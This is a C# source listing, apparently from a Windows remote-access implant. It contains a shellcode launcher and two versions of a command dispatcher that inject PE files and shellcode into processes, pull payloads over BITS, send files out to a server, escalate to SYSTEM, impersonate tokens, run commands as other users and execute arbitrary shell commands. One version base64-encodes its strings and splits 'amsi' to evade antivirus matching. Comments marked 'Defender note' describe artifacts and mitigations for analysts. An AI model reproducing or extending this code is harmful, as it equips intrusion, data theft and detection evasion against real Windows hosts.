/// <summary>
/// Entry point of the shellcode launcher. Packs <paramref name="shellCode"/>, <paramref name="sysCall"/>
/// and <paramref name="pid"/> into an object[] and hands them to <c>ExecuteShellCodeInMemory</c>
/// (not in this listing) on a new thread, then returns without waiting for it.
/// Defender note: the parameter set (raw shellcode bytes, a syscall wrapper, a target process id)
/// is what a cross-process injection routine takes; the worker itself is out of view, so the
/// concrete injection technique cannot be stated from here.
/// </summary>
/// <param name="shellCode">Shellcode bytes as produced by the caller (in this listing, the
/// dispatcher's <c>GetEncryptedFileContent</c> output).</param>
/// <param name="sysCall">Project-specific syscall manager, forwarded unchanged.</param>
/// <param name="pid">Target process id; the dispatcher in this listing passes -1 when the tasking carried none.</param>
public static void Main(byte[] shellCode, SysCallManager sysCall, int pid)
{
    // Created but never referenced again: ExecuteShellCodeInMemory is passed as a method group,
    // so this line only runs the constructor.
    var obj = new LauncherShellCode();
    // Start(object) below requires a ParameterizedThreadStart, so the worker receives the object[].
    var thr1 = new Thread(ExecuteShellCodeInMemory);
    var a = new object[] { shellCode, sysCall, pid };
    // No Join: Main returns as soon as the thread is started. A try/catch around Main (as in the
    // dispatcher's inject_shellcode case) therefore only observes a thread-start failure, not a
    // failure inside the worker, and a "injected" result built on Main returning is not a
    // confirmation that anything was injected.
    thr1.Start(a);
}
/// <summary>
/// Command dispatcher of the implant: runs the tasking in <paramref name="file"/>.Commands[0],
/// produces a short textual result in <c>rps</c>, encrypts it into <c>_tempPath\_id.txt</c> and
/// hands that file to <c>TrySend</c>. Failures inside a case become "ERR:"-prefixed messages; any
/// other exception (including the IndexOutOfRange raised when Commands[1]/Commands[2] are missing,
/// since they are indexed without length checks) is collapsed by the outer bare catch into
/// "ERR: Something went wrong!". Payloads are pulled with <c>_jobsManager.Get</c> at BITS
/// foreground priority into <c>_tempPath</c>, so the temp directory and the BITS job history are
/// the host-side artifacts this method leaves behind.
/// </summary>
/// <param name="file">Parsed tasking; only its <c>Commands</c> array is read here.</param>
private void DoSomething(Content file)
{
    var rps = "";
    try
    {
        switch (file.Commands[0])
        {
            case "inject_pe":
            {
                // Download target <_tempPath>\<_id>; the same path is reused by inject_shellcode and send.
                var fileP = _tempPath + @"\" + _id;
                // Request headers identifying this fetch to the server side (reqId / contid).
                var headers = "reqId: " + _auth + "\r\ncontid: " + ContId;
                if (_jobsManager.Get(_id, fileP, headers, BITS.BG_JOB_PRIORITY.BG_JOB_PRIORITY_FOREGROUND))
                {
                    try
                    {
                        var pe = LoadPE(fileP);
                        var method = file.Commands[1];
                        // Commands[2..] are joined into one string. The inner check is always true
                        // inside the loop, so a trailing space follows the last argument as well.
                        var args = "";
                        for (var i = 2; i < file.Commands.Length; i++)
                        {
                            args += file.Commands[i];
                            if (i < file.Commands.Length)
                            {
                                args += " ";
                            }
                        }
                        // LauncherPE.Main receives a single-element array holding the joined string.
                        var arguments = new string[] { args };
                        LauncherPE.Main(method, arguments, pe);
                        rps = "PE injected!";
                    }
                    catch (Exception)
                    {
                        rps = "ERR:Fatal error occurred while trying to inject the dll.\n";
                    }
                }
                else
                {
                    rps = "ERR:Dll not found!\n";
                }
                break;
            }
            case "inject_shellcode":
            {
                var fileP = _tempPath + @"\" + _id;
                var headers = "reqId: " + _auth + "\r\ncontid: " + ContId;
                // Optional target pid; -1 when the tasking has no second element. int.Parse throws
                // on non-numeric input, which the outer catch turns into the generic error.
                var pid = -1;
                if (file.Commands.Length >= 2)
                {
                    pid = int.Parse(file.Commands[1]);
                }
                if (_jobsManager.Get(_id, fileP, headers, BITS.BG_JOB_PRIORITY.BG_JOB_PRIORITY_FOREGROUND))
                {
                    byte[] sh;
                    // Helper not in view; its name suggests the downloaded file is stored encrypted
                    // and decrypted here — confirm.
                    GetEncryptedFileContent(fileP, out sh);
                    try
                    {
                        // If this is the LauncherShellCode.Main shown earlier in the listing, it only
                        // starts a worker thread, so the catch below cannot observe injection failures
                        // and "Shellcode injected!" does not confirm success.
                        LauncherShellCode.Main(sh, _sysCall, pid);
                        rps = "Shellcode injected!\n";
                    }
                    catch (Exception)
                    {
                        rps = "ERR:Fatal error occurred while trying to inject shellCode.\n";
                    }
                }
                else
                {
                    rps = "ERR:Shellcode file not found!\n";
                }
                break;
            }
            case "powershell":
            {
                // Probes for the PowerShell 2.0 engine by running a trivial command under -V 2 and
                // checking that its output came back. Defender note: the fallback message below
                // states the reason v2 is wanted (no AMSI in that engine); removing the PowerShell
                // 2.0 feature and alerting on engine-version-2 starts closes this path.
                rps = Utils.ExecuteCommand("powershell -V 2 /C Write-Host hi");
                if (rps.Contains("hi"))
                {
                    // Commands[1]/[2] are passed through untouched; the success message formats them
                    // as host:port, so that is presumably what they are — confirm in LauncherPowershell.
                    LauncherPowershell.Main(file.Commands[1], file.Commands[2]);
                    rps = "You should have your Powershell at " + file.Commands[1] + ":" + file.Commands[2] + "!\n";
                }
                else
                {
                    // The literal is split so that "amsi" never appears contiguously in the binary;
                    // the runtime message is the concatenation.
                    rps = "Version 2 of Powershell not available. Try injecting EvilSalsa by CyberVaca in order to use powershell without am" + "si.\n";
                }
                break;
            }
            case "send":
            {
                // Server -> host file drop: fetch into the temp path, then copy to the
                // operator-supplied destination Commands[1], overwriting any existing file.
                var fileP = _tempPath + @"\" + _id;
                var headers = "reqId: " + _auth + "\r\ncontid: " + ContId;
                if (_jobsManager.Get(_id, fileP, headers, BITS.BG_JOB_PRIORITY.BG_JOB_PRIORITY_FOREGROUND))
                {
                    File.Copy(fileP, file.Commands[1], true);
                    // Typo ("Dowload") is part of the wire message and is kept as-is.
                    rps = "Dowload finished.\n";
                }
                else
                {
                    rps = "ERR:Download failed!\n";
                }
                break;
            }
            case "exfiltrate":
            {
                // Host -> server: Commands[1] is the local file, Commands[2] is handed to
                // _jobsManager.Send first (its meaning — remote name or endpoint — is not visible here).
                if (File.Exists(file.Commands[1]))
                {
                    if (_jobsManager.Send(file.Commands[2], file.Commands[1]))
                    {
                        rps = "Exfiltration succeed.\n";
                    }
                    else
                    {
                        rps = "ERR:Exfiltration failed!\n";
                    }
                }
                else
                {
                    rps = "ERR:File to exfiltrate not found!\n";
                }
                break;
            }
            case "getsystem":
            {
                // Only attempted from a high-integrity process; the integrity-check failure and the
                // GetSystem failure produce the same message, so the operator cannot tell them apart.
                if (Utils.IsHighIntegrity(_sysCall))
                {
                    rps = _tokenManager.GetSystem() ? "We are System!\n" : "ERR:Process failed! Is this process running with high integrity level?\n";
                }
                else
                {
                    rps = "ERR:Process failed! Is this process running with high integrity level?\n";
                }
                break;
            }
            case "rev2self":
            {
                // Static call: drops whatever token the instance manager previously applied (helper not in view).
                TokenManager.Rev2Self();
                rps = "Welcome back.\n";
                break;
            }
            case "runas":
            {
                // Commands[1] is "domain\user" or bare "user" (domain defaults to "."); Commands[2]
                // is the plaintext password, present in the tasking and in memory as a string.
                string user = "", domain = "", password = "";
                var userData = file.Commands[1].Split('\\');
                if (userData.Length == 1)
                {
                    domain = ".";
                    user = userData[0];
                }
                else
                {
                    domain = userData[0];
                    user = userData[1];
                }
                password = file.Commands[2];
                rps = TokenManager.RunAs(domain, user, password) ? "Success!" : "ERR:Invalid credentials.";
                break;
            }
            case "list":
            {
                rps = GetProcessInfo();
                break;
            }
            case "impersonate":
            {
                // Commands[1] is a pid; a parse failure or an exception inside Impersonate both
                // land in the bare catch below.
                try
                {
                    if (_tokenManager.Impersonate(int.Parse(file.Commands[1])))
                    {
                        rps = "Impersonation achieved!\n";
                    }
                    else
                    {
                        rps = "ERR: Not enough privileges!\n";
                    }
                }
                catch
                {
                    rps = "ERR: Impersonation failed!\n";
                }
                break;
            }
            case "exit":
            {
                // Terminates the process immediately; the response/TrySend code at the end of this
                // method is never reached for this command.
                Environment.Exit(0);
                break;
            }
            default:
            {
                // Any unrecognised command is run as a shell command. Only Commands[0] is passed;
                // the rest of the array is ignored on this path.
                rps = Utils.ExecuteCommand(file.Commands[0]);
                break;
            }
        }
    }
    catch
    {
        // Bare catch: every failure not handled above is reported with this one message.
        rps = "ERR: Something went wrong!";
    }
    // Result is wrapped with the request id, encrypted to <_tempPath>\<_id>.txt and uploaded;
    // the on-disk copy is another artifact a responder can look for.
    var response = new Response(rps, _auth);
    var filePath = _tempPath + @"\" + _id + ".txt";
    EncryptResponseIntoFile(filePath, response);
    TrySend(filePath);
}
/// <summary>
/// Variant of the command dispatcher: same command set and flow as the plain-string version
/// earlier in the listing (fetch payload via <c>_jobsManager.Get</c> into <c>_tempPath</c>, run
/// the command, encrypt the result into <c>_tempPath\_id.txt</c>, <c>TrySend</c> it), with three
/// differences: the result strings are stored base64-encoded and decoded at runtime, the
/// <c>_contId</c> field is used in the request headers, and <c>_sysCall</c> is passed to
/// <c>Utils.ExecuteCommand</c>, <c>GetSystem</c> and <c>Impersonate</c>. Defender note: the
/// base64 wrapping only hides the literals from static string matching — the decoded values
/// (e.g. "UEUgaW5qZWN0ZWQh" is "PE injected!") are the same messages as in the plain variant and
/// appear in clear in memory and in the encrypted-then-sent response. Commands[1]/Commands[2]
/// are still indexed without length checks; a missing element ends in the outer bare catch.
/// </summary>
/// <param name="file">Parsed tasking; only its <c>Commands</c> array is read here.</param>
private void DoSomething(Content file)
{
    var rps = "";
    try
    {
        switch (file.Commands[0])
        {
            case "inject_pe":
            {
                // Download target <_tempPath>\<_id>, shared with inject_shellcode and send.
                var fileP = _tempPath + @"\" + _id;
                var headers = "reqId: " + _auth + "\r\ncontid: " + _contId;
                if (_jobsManager.Get(_id, fileP, headers, BITS.BG_JOB_PRIORITY.BG_JOB_PRIORITY_FOREGROUND))
                {
                    try
                    {
                        var pe = LoadPE(fileP);
                        var method = file.Commands[1];
                        // Commands[2..] joined with spaces; the inner check is always true inside
                        // the loop, so the joined string ends with a space.
                        var args = "";
                        for (var i = 2; i < file.Commands.Length; i++)
                        {
                            args += file.Commands[i];
                            if (i < file.Commands.Length)
                            {
                                args += " ";
                            }
                        }
                        var arguments = new string[] { args };
                        LauncherPE.Main(method, arguments, pe);
                        // "PE injected!"
                        rps = Encoding.UTF8.GetString(Convert.FromBase64String("UEUgaW5qZWN0ZWQh"));
                    }
                    catch (Exception)
                    {
                        rps = Encoding.UTF8.GetString(Convert.FromBase64String("RVJSOkZhdGFsIGVycm9yIG9jY3VycmVkIHdoaWxlIHRyeWluZyB0byBpbmplY3QgdGhlIGRsbC4="));
                    }
                }
                else
                {
                    // "ERR:Dll not found!"
                    rps = Encoding.UTF8.GetString(Convert.FromBase64String("RVJSOkRsbCBub3QgZm91bmQh"));
                }
                break;
            }
            case "inject_shellcode":
            {
                var fileP = _tempPath + @"\" + _id;
                var headers = "reqId: " + _auth + "\r\ncontid: " + _contId;
                // Optional target pid, -1 when absent; int.Parse failures reach the outer catch.
                var pid = -1;
                if (file.Commands.Length >= 2)
                {
                    pid = int.Parse(file.Commands[1]);
                }
                if (_jobsManager.Get(_id, fileP, headers, BITS.BG_JOB_PRIORITY.BG_JOB_PRIORITY_FOREGROUND))
                {
                    byte[] sh;
                    // Helper not in view; presumably decrypts the downloaded file into sh — confirm.
                    GetEncryptedFileContent(fileP, out sh);
                    try
                    {
                        // If this is the LauncherShellCode.Main shown at the top of the listing it
                        // only starts a worker thread, so this catch does not see injection failures.
                        LauncherShellCode.Main(sh, _sysCall, pid);
                        // "Shellcode injected!"
                        rps = Encoding.UTF8.GetString(Convert.FromBase64String("U2hlbGxjb2RlIGluamVjdGVkIQ=="));
                    }
                    catch (Exception)
                    {
                        rps = Encoding.UTF8.GetString(Convert.FromBase64String("RVJSOkZhdGFsIGVycm9yIG9jY3VycmVkIHdoaWxlIHRyeWluZyB0byBpbmplY3QgdGhlIHNoZWxsY29kZS4="));
                    }
                }
                else
                {
                    rps = Encoding.UTF8.GetString(Convert.FromBase64String("RVJSOlNoZWxsY29kZSBmaWxlIG5vdCBmb3VuZCE="));
                }
                break;
            }
            case "powershell":
            {
                // Decodes to the same PowerShell 2.0 engine probe as the plain variant
                // ("powershell -V 2 /C Write-Host hi"); here it is run through _sysCall.
                // Defender note: the fallback message explains the interest in v2 (no AMSI);
                // removing the PowerShell 2.0 feature and alerting on engine-version-2 starts
                // closes this path.
                rps = Utils.ExecuteCommand(Encoding.UTF8.GetString(Convert.FromBase64String("cG93ZXJzaGVsbCAtViAyIC9DIFdyaXRlLUhvc3QgaGk=")), _sysCall);
                if (rps.Contains("hi"))
                {
                    // Commands[1]/[2] formatted as host:port in the message — presumably that is
                    // what LauncherPowershell expects; confirm there.
                    LauncherPowershell.Main(file.Commands[1], file.Commands[2]);
                    rps = Encoding.UTF8.GetString(Convert.FromBase64String("WW91IHNob3VsZCBoYXZlIHlvdXIgUG93ZXJzaGVsbCBhdCA=")) + file.Commands[1] + ":" + file.Commands[2] + "!\n";
                }
                else
                {
                    // Two base64 halves are concatenated before decoding, and "si.\n" is appended
                    // in clear so that "amsi" never appears contiguously in the binary.
                    rps = Encoding.UTF8.GetString(Convert.FromBase64String("VmVyc2lvbiAyIG9mIFBvd2Vyc2hlbGwgbm90IGF2YWlsYWJsZS4gVHJ5IGluamVjdGluZyB" + "FdmlsU2Fsc2EgYnkgQ3liZXJWYWNhIGluIG9yZGVyIHRvIHVzZSBwb3dlcnNoZWxsIHdpdGhvdXQgYW0=")) + "si.\n";
                }
                break;
            }
            case "send":
            {
                // Server -> host file drop into Commands[1], overwriting an existing file.
                var fileP = _tempPath + @"\" + _id;
                var headers = "reqId: " + _auth + "\r\ncontid: " + _contId;
                if (_jobsManager.Get(_id, fileP, headers, BITS.BG_JOB_PRIORITY.BG_JOB_PRIORITY_FOREGROUND))
                {
                    File.Copy(fileP, file.Commands[1], true);
                    // "Dowload finished." (typo is part of the wire message)
                    rps = Encoding.UTF8.GetString(Convert.FromBase64String("RG93bG9hZCBmaW5pc2hlZC4="));
                }
                else
                {
                    rps = Encoding.UTF8.GetString(Convert.FromBase64String("RVJSOkRvd25sb2FkIGZhaWxlZCE="));
                }
                break;
            }
            case "exfiltrate":
            {
                // Host -> server: Commands[1] is the local file, Commands[2] goes to
                // _jobsManager.Send first (remote name or endpoint — not visible here).
                if (File.Exists(file.Commands[1]))
                {
                    if (_jobsManager.Send(file.Commands[2], file.Commands[1]))
                    {
                        rps = Encoding.UTF8.GetString(Convert.FromBase64String("RXhmaWx0cmF0aW9uIHN1Y2NlZWQu"));
                    }
                    else
                    {
                        rps = Encoding.UTF8.GetString(Convert.FromBase64String("RVJSOkV4ZmlsdHJhdGlvbiBmYWlsZWQh"));
                    }
                }
                else
                {
                    rps = Encoding.UTF8.GetString(Convert.FromBase64String("RVJSOkZpbGUgdG8gZXhmaWx0cmF0ZSBub3QgZm91bmQh"));
                }
                break;
            }
            case "getsystem":
            {
                // Only attempted from a high-integrity process. Note the false branch of the
                // ternary: its concatenated base64 appears to decode to "We are System!" followed
                // by a literal backslash-n and then the "ERR:Process failed! ..." text, so the
                // failure message starts with the success text — confirm by decoding.
                if (Utils.IsHighIntegrity(_sysCall))
                {
                    rps = _tokenManager.GetSystem(_sysCall) ? Encoding.UTF8.GetString(Convert.FromBase64String("V2UgYXJlIFN5c3RlbSE=")) : Encoding.UTF8.GetString(Convert.FromBase64String("V2UgYXJlIFN5c3RlbSFcbkVS" + "UjpQcm9jZXNzIGZhaWxlZCEgSXMgdGhpcyBwcm9jZXNzIHJ1bm5pbmcgd2l0aCBoaWdoIGludGVncml0eSBsZXZlbD8="));
                }
                else
                {
                    rps = Encoding.UTF8.GetString(Convert.FromBase64String("RVJSOlByb2Nlc3MgZmFpbGVkISBJcyB0aGlzIHByb2Nlc3MgcnVubmluZyB3aXRoIGhpZ2ggaW50ZWdyaXR5IGxldmVsPw=="));
                }
                break;
            }
            case "rev2self":
            {
                // Static call; this message is one of the few left in clear in this variant.
                TokenManager.Rev2Self();
                rps = "Welcome back.\n";
                break;
            }
            case "runas":
            {
                // Commands[1] is "domain\user" or bare "user" (domain defaults to "."); Commands[2]
                // is the plaintext password.
                string user = "", domain = "", password = "";
                var userData = file.Commands[1].Split('\\');
                if (userData.Length == 1)
                {
                    domain = ".";
                    user = userData[0];
                }
                else
                {
                    domain = userData[0];
                    user = userData[1];
                }
                password = file.Commands[2];
                rps = TokenManager.RunAs(domain, user, password) ? "Success!" : Encoding.UTF8.GetString(Convert.FromBase64String("RVJSOkludmFsaWQgY3JlZGVudGlhbHMu"));
                break;
            }
            case "list":
            {
                rps = GetProcessInfo();
                break;
            }
            case "impersonate":
            {
                // Commands[1] is a pid; parse failures and exceptions from Impersonate both land
                // in the bare catch below.
                try
                {
                    if (_tokenManager.Impersonate(int.Parse(file.Commands[1]), _sysCall))
                    {
                        rps = Encoding.UTF8.GetString(Convert.FromBase64String("SW1wZXJzb25hdGlvbiBhY2hpZXZlZCE="));
                    }
                    else
                    {
                        rps = Encoding.UTF8.GetString(Convert.FromBase64String("RVJSOiBOb3QgZW5vdWdoIHByaXZpbGVnZXMh"));
                    }
                }
                catch
                {
                    rps = Encoding.UTF8.GetString(Convert.FromBase64String("RVJSOiBJbXBlcnNvbmF0aW9uIGZhaWxlZCE="));
                }
                break;
            }
            case "exit":
            {
                // Terminates the process; the response/TrySend code below is never reached.
                Environment.Exit(0);
                break;
            }
            default:
            {
                // Unrecognised commands are run as shell commands; only Commands[0] is passed.
                rps = Utils.ExecuteCommand(file.Commands[0], _sysCall);
                break;
            }
        }
    }
    catch
    {
        // Bare catch; decodes to "ERR: Something went wrong!".
        rps = Encoding.UTF8.GetString(Convert.FromBase64String("RVJSOiBTb21ldGhpbmcgd2VudCB3cm9uZyE="));
    }
    // Result wrapped with the request id, encrypted to <_tempPath>\<_id>.txt and uploaded.
    var response = new Response(rps, _auth);
    var filePath = _tempPath + @"\" + _id + ".txt";
    EncryptResponseIntoFile(filePath, response);
    TrySend(filePath);
}